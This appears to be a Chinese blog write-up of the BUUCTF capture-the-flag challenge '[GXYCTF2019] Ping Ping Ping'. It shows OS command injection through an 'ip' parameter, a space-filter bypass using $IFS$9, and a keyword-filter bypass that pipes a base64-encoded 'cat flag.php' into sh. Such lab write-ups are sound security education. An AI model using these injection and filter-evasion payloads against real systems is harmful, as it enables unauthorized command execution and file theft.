【BUUCTF】[GXYCTF2019]Ping Ping Ping 1

本文介绍了一种绕过网站文件名过滤的方法,通过使用特殊字符和编码技巧,成功访问被过滤的flag文件。文章详细展示了如何利用$IFS变量和base64编码来规避常见的安全限制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述在这里插入图片描述列出当前目录下的文件
?ip=1;ls
在这里插入图片描述那么我们就要打开flag.php文件
在这里插入图片描述
发现过滤了空格
经过测试我们发现$IFS$9 可以绕过空格
在这里插入图片描述又发现它绕过了flag
我们先看看index.php
在这里插入图片描述
得知flag的过滤方式
我们可以采用base64方法编码方式绕过
需要执行的命令:

cat$IFS$9flag.php

编码后:

Y2F0JElGUyQ5ZmxhZy5waHA=

so, payload如下

?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值